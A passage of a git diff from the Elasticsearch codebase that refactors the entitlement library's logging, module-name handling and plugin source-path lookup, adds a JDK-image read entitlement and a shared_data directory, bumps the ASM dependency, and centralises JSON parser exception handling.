path : Strings.format("%s -> %s", path, realPath) ), - callerClass, + requestingClass, entitlements ); } @@ -265,7 +264,7 @@ public void checkFileWrite(Class callerClass, File file) { @Override public void checkFileWrite(Class callerClass, Path path) { - if (PolicyCheckerImpl.isPathOnDefaultFilesystem(path) == false) { + if (isPathOnDefaultFilesystem(path) == false) { return; } var requestingClass = requestingClass(callerClass); @@ -279,11 +278,11 @@ public void checkFileWrite(Class callerClass, Path path) { Strings.format( "component [%s], module [%s], class [%s], entitlement [file], operation [write], path [%s]", entitlements.componentName(), - PolicyCheckerImpl.getModuleName(requestingClass), + entitlements.moduleName(), requestingClass, path ), - callerClass, + requestingClass, entitlements ); } @@ -360,8 +359,8 @@ public void checkAllNetworkAccess(Class callerClass) { } var classEntitlements = policyManager.getEntitlements(requestingClass); - checkFlagEntitlement(classEntitlements, InboundNetworkEntitlement.class, requestingClass, callerClass); - checkFlagEntitlement(classEntitlements, OutboundNetworkEntitlement.class, requestingClass, callerClass); + checkFlagEntitlement(classEntitlements, InboundNetworkEntitlement.class, requestingClass); + checkFlagEntitlement(classEntitlements, OutboundNetworkEntitlement.class, requestingClass); } @Override @@ -378,27 +377,26 @@ public void checkWriteProperty(Class callerClass, String property) { ModuleEntitlements entitlements = policyManager.getEntitlements(requestingClass); if (entitlements.getEntitlements(WriteSystemPropertiesEntitlement.class).anyMatch(e -> e.properties().contains(property))) { - entitlements.logger() - .debug( - () -> Strings.format( - "Entitled: component [%s], module [%s], class [%s], entitlement [write_system_properties], property [%s]", - entitlements.componentName(), - PolicyCheckerImpl.getModuleName(requestingClass), - requestingClass, - property - ) - ); + PolicyManager.generalLogger.debug( + () -> Strings.format( + "Entitled: component [%s], module [%s], class [%s], entitlement [write_system_properties], property [%s]", + entitlements.componentName(), + entitlements.moduleName(), + requestingClass, + property + ) + ); return; } notEntitled( Strings.format( "component [%s], module [%s], class [%s], entitlement [write_system_properties], property [%s]", entitlements.componentName(), - PolicyCheckerImpl.getModuleName(requestingClass), + entitlements.moduleName(), requestingClass, property ), - callerClass, + requestingClass, entitlements ); } @@ -439,39 +437,37 @@ Optional findRequestingFrame(Stream entitlementClass, - Class requestingClass, - Class callerClass + Class requestingClass ) { if (classEntitlements.hasEntitlement(entitlementClass) == false) { notEntitled( Strings.format( "component [%s], module [%s], class [%s], entitlement [%s]", classEntitlements.componentName(), - PolicyCheckerImpl.getModuleName(requestingClass), + classEntitlements.moduleName(), requestingClass, PolicyParser.buildEntitlementNameFromClass(entitlementClass) ), - callerClass, + requestingClass, classEntitlements ); } - classEntitlements.logger() - .debug( - () -> Strings.format( - "Entitled: component [%s], module [%s], class [%s], entitlement [%s]", - classEntitlements.componentName(), - PolicyCheckerImpl.getModuleName(requestingClass), - requestingClass, - PolicyParser.buildEntitlementNameFromClass(entitlementClass) - ) - ); + PolicyManager.generalLogger.debug( + () -> Strings.format( + "Entitled: component [%s], module [%s], class [%s], 
entitlement [%s]", + classEntitlements.componentName(), + classEntitlements.moduleName(), + requestingClass, + PolicyParser.buildEntitlementNameFromClass(entitlementClass) + ) + ); } - private void notEntitled(String message, Class callerClass, ModuleEntitlements entitlements) { + private void notEntitled(String message, Class requestingClass, ModuleEntitlements entitlements) { var exception = new NotEntitledException(message); // Don't emit a log for suppressed packages, e.g. packages containing self tests - if (suppressFailureLogPackages.contains(callerClass.getPackage()) == false) { - entitlements.logger().warn("Not entitled: {}", message, exception); + if (suppressFailureLogPackages.contains(requestingClass.getPackage()) == false) { + entitlements.logger(requestingClass).warn("Not entitled: {}", message, exception); } throw exception; } @@ -482,7 +478,7 @@ public void checkEntitlementPresent(Class callerClass, Class callerClass, URL url) { if (jarFileUrl == null || handleNetworkOrFileUrlCheck(callerClass, jarFileUrl) == false) { checkUnsupportedURLProtocolConnection(callerClass, "jar with unsupported inner protocol"); } + } else if (isJrtUrl(url)) { + checkEntitlementPresent(callerClass, ReadJdkImageEntitlement.class); } else { checkUnsupportedURLProtocolConnection(callerClass, url.getProtocol()); } @@ -565,6 +563,10 @@ private static boolean isJarUrl(java.net.URL url) { return "jar".equals(url.getProtocol()); } + private static boolean isJrtUrl(java.net.URL url) { + return "jrt".equals(url.getProtocol()); + } + // We have to use class names for sun.net.www classes as java.base does not export them private static final List ADDITIONAL_NETWORK_URL_CONNECT_CLASS_NAMES = List.of( "sun.net.www.protocol.ftp.FtpURLConnection", diff --git a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PolicyManager.java b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PolicyManager.java index d05d9ad5858cd..3c5948d7824b7 100644 --- a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PolicyManager.java +++ b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PolicyManager.java @@ -22,9 +22,11 @@ import java.nio.file.Paths; import java.util.ArrayList; import java.util.Collection; +import java.util.Collections; import java.util.HashSet; import java.util.List; import java.util.Map; +import java.util.Objects; import java.util.Set; import java.util.concurrent.ConcurrentHashMap; import java.util.function.Function; @@ -52,7 +54,7 @@ public class PolicyManager { */ static final Logger generalLogger = LogManager.getLogger(PolicyManager.class); - static final Set MODULES_EXCLUDED_FROM_SYSTEM_MODULES = Set.of("java.desktop"); + static final Set MODULES_EXCLUDED_FROM_SYSTEM_MODULES = Set.of("java.desktop", "java.xml"); /** * Identifies a particular entitlement {@link Scope} within a {@link Policy}. @@ -118,11 +120,11 @@ public enum ComponentKind { * * @param componentName the plugin name or else one of the special component names like "(server)". 
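Aside: a small sketch of what the jrt handling above amounts to. The isJrtUrl predicate mirrors the one added in this diff; the standalone class and the sample URL are illustrative. jrt: URLs address the JDK's read-only runtime image (jimage), so opening one is gated on ReadJdkImageEntitlement rather than on the file or network checks.

import java.io.InputStream;
import java.net.URI;
import java.net.URL;

public class JrtUrlSketch {

    // Mirrors the isJrtUrl predicate added above: jrt URLs point into the JDK's
    // read-only runtime image, so URL connections to them are checked against
    // ReadJdkImageEntitlement instead of the file or network entitlements.
    static boolean isJrtUrl(URL url) {
        return "jrt".equals(url.getProtocol());
    }

    public static void main(String[] args) throws Exception {
        URL inJdkImage = URI.create("jrt:/java.xml/javax/xml/parsers/SAXParserFactory.class").toURL();
        System.out.println(isJrtUrl(inJdkImage)); // true
        // Reading works because the runtime image ships with the JDK and is read-only.
        try (InputStream in = inJdkImage.openStream()) {
            System.out.println("read " + in.readAllBytes().length + " bytes from the jdk image");
        }
    }
}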
*/ - record ModuleEntitlements( + protected record ModuleEntitlements( String componentName, + String moduleName, Map, List> entitlementsByType, - FileAccessTree fileAccess, - Logger logger + FileAccessTree fileAccess ) { public ModuleEntitlements { @@ -140,6 +142,12 @@ public Stream getEntitlements(Class entitlementCla } return entitlements.stream().map(entitlementClass::cast); } + + Logger logger(Class requestingClass) { + var packageName = requestingClass.getPackageName(); + var loggerSuffix = "." + componentName + "." + ((moduleName == null) ? ALL_UNNAMED : moduleName) + "." + packageName; + return LogManager.getLogger(PolicyManager.class.getName() + loggerSuffix); + } } private FileAccessTree getDefaultFileAccess(Collection componentPaths) { @@ -148,7 +156,7 @@ private FileAccessTree getDefaultFileAccess(Collection componentPaths) { // pkg private for testing ModuleEntitlements defaultEntitlements(String componentName, Collection componentPaths, String moduleName) { - return new ModuleEntitlements(componentName, Map.of(), getDefaultFileAccess(componentPaths), getLogger(componentName, moduleName)); + return new ModuleEntitlements(componentName, moduleName, Map.of(), getDefaultFileAccess(componentPaths)); } // pkg private for testing @@ -166,9 +174,9 @@ ModuleEntitlements policyEntitlements( } return new ModuleEntitlements( componentName, + moduleName, entitlements.stream().collect(groupingBy(Entitlement::getClass)), - FileAccessTree.of(componentName, moduleName, filesEntitlement, pathLookup, componentPaths, exclusivePaths), - getLogger(componentName, moduleName) + FileAccessTree.of(componentName, moduleName, filesEntitlement, pathLookup, componentPaths, exclusivePaths) ); } @@ -209,7 +217,7 @@ private static Set findSystemLayerModules() { .filter(m -> SYSTEM_LAYER_MODULES.contains(m) == false) .collect(Collectors.toUnmodifiableSet()); - private final Map> pluginSourcePaths; + private final Function> pluginSourcePathsResolver; /** * Paths that are only allowed for a single module. Used to generate @@ -223,7 +231,7 @@ public PolicyManager( List apmAgentEntitlements, Map pluginPolicies, Function, PolicyScope> scopeResolver, - Map> pluginSourcePaths, + Function> pluginSourcePathsResolver, PathLookup pathLookup ) { this.serverEntitlements = buildScopeEntitlementsMap(requireNonNull(serverPolicy)); @@ -232,7 +240,7 @@ public PolicyManager( .stream() .collect(toUnmodifiableMap(Map.Entry::getKey, e -> buildScopeEntitlementsMap(e.getValue()))); this.scopeResolver = scopeResolver; - this.pluginSourcePaths = pluginSourcePaths; + this.pluginSourcePathsResolver = pluginSourcePathsResolver; this.pathLookup = requireNonNull(pathLookup); List exclusiveFileEntitlements = new ArrayList<>(); @@ -278,26 +286,11 @@ private static void validateEntitlementsPerModule( } } - private static Logger getLogger(String componentName, String moduleName) { - var loggerSuffix = "." + componentName + "." + ((moduleName == null) ? ALL_UNNAMED : moduleName); - return MODULE_LOGGERS.computeIfAbsent(PolicyManager.class.getName() + loggerSuffix, LogManager::getLogger); - } - - /** - * We want to use the same {@link Logger} object for a given name, because we want {@link ModuleEntitlements} - * {@code equals} and {@code hashCode} to work. - *

- * This would not be required if LogManager - * memoized the loggers, - * but here we are. - */ - private static final ConcurrentHashMap MODULE_LOGGERS = new ConcurrentHashMap<>(); - - ModuleEntitlements getEntitlements(Class requestingClass) { + protected ModuleEntitlements getEntitlements(Class requestingClass) { return moduleEntitlementsMap.computeIfAbsent(requestingClass.getModule(), m -> computeEntitlements(requestingClass)); } - private ModuleEntitlements computeEntitlements(Class requestingClass) { + protected final ModuleEntitlements computeEntitlements(Class requestingClass) { var policyScope = scopeResolver.apply(requestingClass); var componentName = policyScope.componentName(); var moduleName = policyScope.moduleName(); @@ -326,7 +319,10 @@ private ModuleEntitlements computeEntitlements(Class requestingClass) { default -> { assert policyScope.kind() == PLUGIN; var pluginEntitlements = pluginsEntitlements.get(componentName); - Collection componentPaths = pluginSourcePaths.getOrDefault(componentName, List.of()); + Collection componentPaths = Objects.requireNonNullElse( + pluginSourcePathsResolver.apply(componentName), + Collections.emptyList() + ); if (pluginEntitlements == null) { return defaultEntitlements(componentName, componentPaths, moduleName); } else { @@ -336,8 +332,7 @@ private ModuleEntitlements computeEntitlements(Class requestingClass) { } } - // pkg private for testing - static Collection getComponentPathsFromClass(Class requestingClass) { + protected Collection getComponentPathsFromClass(Class requestingClass) { var codeSource = requestingClass.getProtectionDomain().getCodeSource(); if (codeSource == null) { return List.of(); @@ -372,9 +367,7 @@ private ModuleEntitlements getModuleScopeEntitlements( * @return true if permission is granted regardless of the entitlement */ boolean isTriviallyAllowed(Class requestingClass) { - if (generalLogger.isTraceEnabled()) { - generalLogger.trace("Stack trace for upcoming trivially-allowed check", new Exception()); - } + // note: do not log exceptions in here, this could interfere with loading of additionally necessary classes such as ThrowableProxy if (requestingClass == null) { generalLogger.debug("Entitlement trivially allowed: no caller frames outside the entitlement library"); return true; diff --git a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/entitlements/FilesEntitlement.java b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/entitlements/FilesEntitlement.java index 872a083a76ba6..cc9ef9d263dd1 100644 --- a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/entitlements/FilesEntitlement.java +++ b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/entitlements/FilesEntitlement.java @@ -182,8 +182,9 @@ private static BaseDir parseBaseDir(String baseDir) { case "config" -> BaseDir.CONFIG; case "data" -> BaseDir.DATA; case "home" -> BaseDir.USER_HOME; + case "shared_data" -> BaseDir.SHARED_DATA; // it would be nice to limit this to just ES modules, but we don't have a way to plumb that through to here - // however, we still don't document in the error case below that shared_repo is valid + // however, we still don't document in the error case below that shared_repo and shared_data are valid case "shared_repo" -> BaseDir.SHARED_REPO; default -> throw new PolicyValidationException( "invalid relative directory: " + baseDir + ", valid values: [config, data, home]" diff --git 
a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/entitlements/ReadJdkImageEntitlement.java b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/entitlements/ReadJdkImageEntitlement.java new file mode 100644 index 0000000000000..fa13203204c30 --- /dev/null +++ b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/entitlements/ReadJdkImageEntitlement.java @@ -0,0 +1,19 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.entitlement.runtime.policy.entitlements; + +/** + * Internal entitlement to read code from the jdk. + * + * Concretely this means the code can open jrt urls. Since the java + * runtime images (jrt) are read only, this implicitly only allows + * reading those urls. + */ +public class ReadJdkImageEntitlement implements Entitlement {} diff --git a/libs/entitlement/src/test/java/org/elasticsearch/entitlement/bootstrap/FilesEntitlementsValidationTests.java b/libs/entitlement/src/test/java/org/elasticsearch/entitlement/bootstrap/FilesEntitlementsValidationTests.java index 7c4a14dd44cab..07631e7dbf5d6 100644 --- a/libs/entitlement/src/test/java/org/elasticsearch/entitlement/bootstrap/FilesEntitlementsValidationTests.java +++ b/libs/entitlement/src/test/java/org/elasticsearch/entitlement/bootstrap/FilesEntitlementsValidationTests.java @@ -48,6 +48,7 @@ public static void beforeClass() { testBaseDir.resolve("user/home"), TEST_CONFIG_DIR, new Path[] { testBaseDir.resolve("data1"), testBaseDir.resolve("data2") }, + Path.of("/shareddata"), new Path[] { testBaseDir.resolve("shared1"), testBaseDir.resolve("shared2") }, TEST_LIBS_DIR, testBaseDir.resolve("modules"), diff --git a/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/FileAccessTreeTests.java b/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/FileAccessTreeTests.java index 9307f89b4d0d3..5f5378b5e1fe9 100644 --- a/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/FileAccessTreeTests.java +++ b/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/FileAccessTreeTests.java @@ -59,6 +59,7 @@ private static Path path(String s) { Path.of("/home"), Path.of("/config"), new Path[] { Path.of("/data1"), Path.of("/data2") }, + Path.of("/shareddata"), new Path[] { Path.of("/shared1"), Path.of("/shared2") }, Path.of("/lib"), Path.of("/modules"), diff --git a/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/PolicyManagerTests.java b/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/PolicyManagerTests.java index a8e66ffae0feb..29678d14fc507 100644 --- a/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/PolicyManagerTests.java +++ b/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/PolicyManagerTests.java @@ -33,6 +33,7 @@ import java.net.URLClassLoader; import java.nio.file.Path; import java.util.Collection; +import java.util.Collections; import java.util.List; import java.util.Map; import java.util.Set; @@ -70,6 +71,7 
@@ public static void beforeClass() { baseDir.resolve("/user/home"), baseDir.resolve("/config"), new Path[] { baseDir.resolve("/data1/"), baseDir.resolve("/data2") }, + Path.of("/shareddata"), new Path[] { baseDir.resolve("/shared1"), baseDir.resolve("/shared2") }, baseDir.resolve("/lib"), baseDir.resolve("/modules"), @@ -89,16 +91,16 @@ public void testGetEntitlements() { AtomicReference policyScope = new AtomicReference<>(); // A common policy with a variety of entitlements to test - Collection thisSourcePaths = PolicyManager.getComponentPathsFromClass(getClass()); var plugin1SourcePaths = List.of(Path.of("modules", "plugin1")); var policyManager = new PolicyManager( new Policy("server", List.of(new Scope("org.example.httpclient", List.of(new OutboundNetworkEntitlement())))), List.of(), Map.of("plugin1", new Policy("plugin1", List.of(new Scope("plugin.module1", List.of(new ExitVMEntitlement()))))), c -> policyScope.get(), - Map.of("plugin1", plugin1SourcePaths), + Map.of("plugin1", plugin1SourcePaths)::get, TEST_PATH_LOOKUP ); + Collection thisSourcePaths = policyManager.getComponentPathsFromClass(getClass()); // "Unspecified" below means that the module is not named in the policy @@ -170,7 +172,7 @@ public void testAgentsEntitlements() throws IOException, ClassNotFoundException c -> c.getPackageName().startsWith(TEST_AGENTS_PACKAGE_NAME) ? PolicyScope.apmAgent("test.agent.module") : PolicyScope.plugin("test", "test.plugin.module"), - Map.of(), + name -> Collections.emptyList(), TEST_PATH_LOOKUP ); ModuleEntitlements agentsEntitlements = policyManager.getEntitlements(TestAgent.class); @@ -197,7 +199,7 @@ public void testDuplicateEntitlements() { List.of(), Map.of(), c -> PolicyScope.plugin("test", moduleName(c)), - Map.of(), + name -> Collections.emptyList(), TEST_PATH_LOOKUP ) ); @@ -213,7 +215,7 @@ public void testDuplicateEntitlements() { List.of(new CreateClassLoaderEntitlement(), new CreateClassLoaderEntitlement()), Map.of(), c -> PolicyScope.plugin("test", moduleName(c)), - Map.of(), + name -> Collections.emptyList(), TEST_PATH_LOOKUP ) ); @@ -249,7 +251,7 @@ public void testDuplicateEntitlements() { ) ), c -> PolicyScope.plugin("plugin1", moduleName(c)), - Map.of("plugin1", List.of(Path.of("modules", "plugin1"))), + Map.of("plugin1", List.of(Path.of("modules", "plugin1")))::get, TEST_PATH_LOOKUP ) ); @@ -299,7 +301,7 @@ public void testFilesEntitlementsWithExclusive() { ) ), c -> PolicyScope.plugin("", moduleName(c)), - Map.of("plugin1", List.of(Path.of("modules", "plugin1")), "plugin2", List.of(Path.of("modules", "plugin2"))), + Map.of("plugin1", List.of(Path.of("modules", "plugin1")), "plugin2", List.of(Path.of("modules", "plugin2")))::get, TEST_PATH_LOOKUP ) ); @@ -350,7 +352,7 @@ public void testFilesEntitlementsWithExclusive() { ) ), c -> PolicyScope.plugin("", moduleName(c)), - Map.of(), + name -> Collections.emptyList(), TEST_PATH_LOOKUP ) ); diff --git a/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/entitlements/FilesEntitlementTests.java b/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/entitlements/FilesEntitlementTests.java index 84c4833ca6aae..d6f85eb4f069a 100644 --- a/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/entitlements/FilesEntitlementTests.java +++ b/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/entitlements/FilesEntitlementTests.java @@ -47,6 +47,7 @@ public static void setupRoot() { Path.of("/home"), Path.of("/config"), new Path[] { 
Path.of("/data1"), Path.of("/data2") }, + Path.of("/shareddata"), new Path[] { Path.of("/shared1"), Path.of("/shared2") }, Path.of("/lib"), Path.of("/modules"), diff --git a/libs/plugin-scanner/build.gradle b/libs/plugin-scanner/build.gradle index 44e6853140a5b..5ec59ad7715a9 100644 --- a/libs/plugin-scanner/build.gradle +++ b/libs/plugin-scanner/build.gradle @@ -20,8 +20,8 @@ dependencies { api project(':libs:plugin-api') api project(":libs:x-content") - api 'org.ow2.asm:asm:9.7.1' - api 'org.ow2.asm:asm-tree:9.7.1' + api 'org.ow2.asm:asm:9.8' + api 'org.ow2.asm:asm-tree:9.8' testImplementation "junit:junit:${versions.junit}" testImplementation(project(":test:framework")) { diff --git a/libs/simdvec/src/main21/java/org/elasticsearch/simdvec/internal/vectorization/ESVectorizationProvider.java b/libs/simdvec/src/main21/java/org/elasticsearch/simdvec/internal/vectorization/ESVectorizationProvider.java index 4708a052b05db..f67a905f74bc9 100644 --- a/libs/simdvec/src/main21/java/org/elasticsearch/simdvec/internal/vectorization/ESVectorizationProvider.java +++ b/libs/simdvec/src/main21/java/org/elasticsearch/simdvec/internal/vectorization/ESVectorizationProvider.java @@ -46,7 +46,7 @@ public static ESVectorizationProvider getInstance() { static ESVectorizationProvider lookup(boolean testMode) { final int runtimeVersion = Runtime.version().feature(); assert runtimeVersion >= 21; - if (runtimeVersion <= 24) { + if (runtimeVersion <= 25) { // only use vector module with Hotspot VM if (Constants.IS_HOTSPOT_VM == false) { logger.warn("Java runtime is not using Hotspot VM; Java vector incubator API can't be enabled."); diff --git a/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/ESUTF8StreamJsonParser.java b/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/ESUTF8StreamJsonParser.java index 0491efcea0a0f..c4a9823d68ecf 100644 --- a/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/ESUTF8StreamJsonParser.java +++ b/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/ESUTF8StreamJsonParser.java @@ -112,7 +112,8 @@ protected Text _finishAndReturnText() throws IOException { return null; } ptr += bytesToSkip; - ++stringLength; + // Code points that require 4 bytes in UTF-8 will use 2 chars in UTF-16. + stringLength += (bytesToSkip == 4 ? 2 : 1); } default -> { return null; diff --git a/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/JsonXContentImpl.java b/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/JsonXContentImpl.java index 067985b404f3e..d109fd28dd839 100644 --- a/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/JsonXContentImpl.java +++ b/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/JsonXContentImpl.java @@ -28,6 +28,8 @@ import java.io.Reader; import java.util.Set; +import static org.elasticsearch.xcontent.provider.json.JsonXContentParser.handleParserException; + /** * A JSON based content implementation using Jackson. 
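Aside: the arithmetic behind the stringLength fix above, as a runnable check. Any code point that needs 4 bytes in UTF-8 lies outside the BMP and therefore occupies a surrogate pair (two chars) in UTF-16, so counting it as a single char undercounted the Java string length. The class name here is illustrative.

import java.nio.charset.StandardCharsets;

public class Utf8SurrogateLengthSketch {
    public static void main(String[] args) {
        String smiley = "\uD83D\uDE0A"; // U+1F60A, outside the BMP

        // 4 bytes in UTF-8, but two UTF-16 chars (a surrogate pair): this is why
        // the parser adds 2 to stringLength when it skips a 4-byte UTF-8 sequence.
        System.out.println(smiley.getBytes(StandardCharsets.UTF_8).length); // 4
        System.out.println(smiley.length());                                // 2
        System.out.println(smiley.codePointCount(0, smiley.length()));      // 1
    }
}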
*/ @@ -95,21 +97,37 @@ private XContentParser createParser(XContentParserConfiguration config, JsonParser parser) { @Override public XContentParser createParser(XContentParserConfiguration config, String content) throws IOException { - return createParser(config, jsonFactory.createParser(content)); + try { + return createParser(config, jsonFactory.createParser(content)); + } catch (IOException e) { + throw handleParserException(e); + } } @Override public XContentParser createParser(XContentParserConfiguration config, InputStream is) throws IOException { - return createParser(config, jsonFactory.createParser(is)); + try { + return createParser(config, jsonFactory.createParser(is)); + } catch (IOException e) { + throw handleParserException(e); + } } @Override public XContentParser createParser(XContentParserConfiguration config, byte[] data, int offset, int length) throws IOException { - return createParser(config, jsonFactory.createParser(data, offset, length)); + try { + return createParser(config, jsonFactory.createParser(data, offset, length)); + } catch (IOException e) { + throw handleParserException(e); + } } @Override public XContentParser createParser(XContentParserConfiguration config, Reader reader) throws IOException { - return createParser(config, jsonFactory.createParser(reader)); + try { + return createParser(config, jsonFactory.createParser(reader)); + } catch (IOException e) { + throw handleParserException(e); + } } } diff --git a/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/JsonXContentParser.java b/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/JsonXContentParser.java index 3471fd362f88e..9530627157683 100644 --- a/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/JsonXContentParser.java +++ b/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/JsonXContentParser.java @@ -15,6 +15,7 @@ import com.fasterxml.jackson.core.JsonProcessingException; import com.fasterxml.jackson.core.JsonToken; import com.fasterxml.jackson.core.exc.InputCoercionException; +import com.fasterxml.jackson.core.exc.StreamConstraintsException; import com.fasterxml.jackson.core.io.JsonEOFException; import org.elasticsearch.core.IOUtils; @@ -28,6 +29,7 @@ import org.elasticsearch.xcontent.provider.XContentParserConfigurationImpl; import org.elasticsearch.xcontent.support.AbstractXContentParser; +import java.io.CharConversionException; import java.io.IOException; import java.nio.CharBuffer; @@ -50,20 +52,42 @@ public void allowDuplicateKeys(boolean allowDuplicateKeys) { parser.configure(JsonParser.Feature.STRICT_DUPLICATE_DETECTION, allowDuplicateKeys == false); } - private static XContentParseException newXContentParseException(JsonProcessingException e) { + private static XContentLocation getLocation(JsonProcessingException e) { JsonLocation loc = e.getLocation(); - throw new XContentParseException(new XContentLocation(loc.getLineNr(), loc.getColumnNr()), e.getMessage(), e); + if (loc != null) { + return new XContentLocation(loc.getLineNr(), loc.getColumnNr()); + } else { + return null; + } + } + + private static XContentParseException newXContentParseException(JsonProcessingException e) { + return new XContentParseException(getLocation(e), e.getMessage(), e); + } + + /** + * Handle parser exception depending on type. + * This converts known exceptions to XContentParseException (or XContentEOFException) and rethrows them; any other IOException is returned unchanged for the caller to rethrow. 
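Aside: what the wrapping above buys callers of the x-content API. JsonXContent.jsonXContent and XContentParserConfiguration.EMPTY are the existing public entry points; the class name and input bytes here are illustrative. Malformed JSON now consistently surfaces as XContentParseException rather than as a raw Jackson IOException:

import org.elasticsearch.xcontent.XContentParseException;
import org.elasticsearch.xcontent.XContentParser;
import org.elasticsearch.xcontent.XContentParserConfiguration;
import org.elasticsearch.xcontent.json.JsonXContent;

import java.nio.charset.StandardCharsets;

public class ParserExceptionTranslationSketch {
    public static void main(String[] args) throws Exception {
        byte[] malformed = "{\"a\": tru}".getBytes(StandardCharsets.UTF_8);
        try (
            XContentParser parser = JsonXContent.jsonXContent
                .createParser(XContentParserConfiguration.EMPTY, malformed, 0, malformed.length)
        ) {
            while (parser.nextToken() != null) {
                // walk the document until the malformed literal is hit
            }
        } catch (XContentParseException e) {
            // Jackson's JsonParseException is translated here, carrying line/column
            // information whenever Jackson supplied a location.
            System.out.println("parse failure: " + e.getMessage());
        }
    }
}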
+ */ + static IOException handleParserException(IOException e) throws IOException { + switch (e) { + case JsonEOFException eof -> throw new XContentEOFException(getLocation(eof), "Unexpected end of file", e); + case JsonParseException pe -> throw newXContentParseException(pe); + case InputCoercionException ice -> throw newXContentParseException(ice); + case CharConversionException cce -> throw new XContentParseException(null, cce.getMessage(), cce); + case StreamConstraintsException sce -> throw newXContentParseException(sce); + default -> { + return e; + } + } } @Override public Token nextToken() throws IOException { try { return convertToken(parser.nextToken()); - } catch (JsonEOFException e) { - JsonLocation location = e.getLocation(); - throw new XContentEOFException(new XContentLocation(location.getLineNr(), location.getColumnNr()), "Unexpected end of file", e); - } catch (JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -71,8 +95,8 @@ public Token nextToken() throws IOException { public String nextFieldName() throws IOException { try { return parser.nextFieldName(); - } catch (JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -100,8 +124,8 @@ public String currentName() throws IOException { protected boolean doBooleanValue() throws IOException { try { return parser.getBooleanValue(); - } catch (JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -112,8 +136,8 @@ public String text() throws IOException { } try { return parser.getText(); - } catch (JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -139,8 +163,8 @@ private void throwOnNoText() { public CharBuffer charBuffer() throws IOException { try { return CharBuffer.wrap(parser.getTextCharacters(), parser.getTextOffset(), parser.getTextLength()); - } catch (JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -189,8 +213,8 @@ public boolean hasTextCharacters() { public char[] textCharacters() throws IOException { try { return parser.getTextCharacters(); - } catch (JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -198,8 +222,8 @@ public char[] textCharacters() throws IOException { public int textLength() throws IOException { try { return parser.getTextLength(); - } catch (JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -207,8 +231,8 @@ public int textLength() throws IOException { public int textOffset() throws IOException { try { return parser.getTextOffset(); - } catch (JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -216,8 +240,8 @@ public int textOffset() throws IOException { public Number numberValue() throws IOException { try { return parser.getNumberValue(); - } catch (InputCoercionException | JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -225,8 +249,8 @@ public Number numberValue() throws IOException { public short doShortValue() throws IOException { try { return parser.getShortValue(); - } catch 
(InputCoercionException | JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -234,8 +258,8 @@ public short doShortValue() throws IOException { public int doIntValue() throws IOException { try { return parser.getIntValue(); - } catch (InputCoercionException | JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -243,8 +267,8 @@ public int doIntValue() throws IOException { public long doLongValue() throws IOException { try { return parser.getLongValue(); - } catch (InputCoercionException | JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -252,8 +276,8 @@ public long doLongValue() throws IOException { public float doFloatValue() throws IOException { try { return parser.getFloatValue(); - } catch (InputCoercionException | JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -261,8 +285,8 @@ public float doFloatValue() throws IOException { public double doDoubleValue() throws IOException { try { return 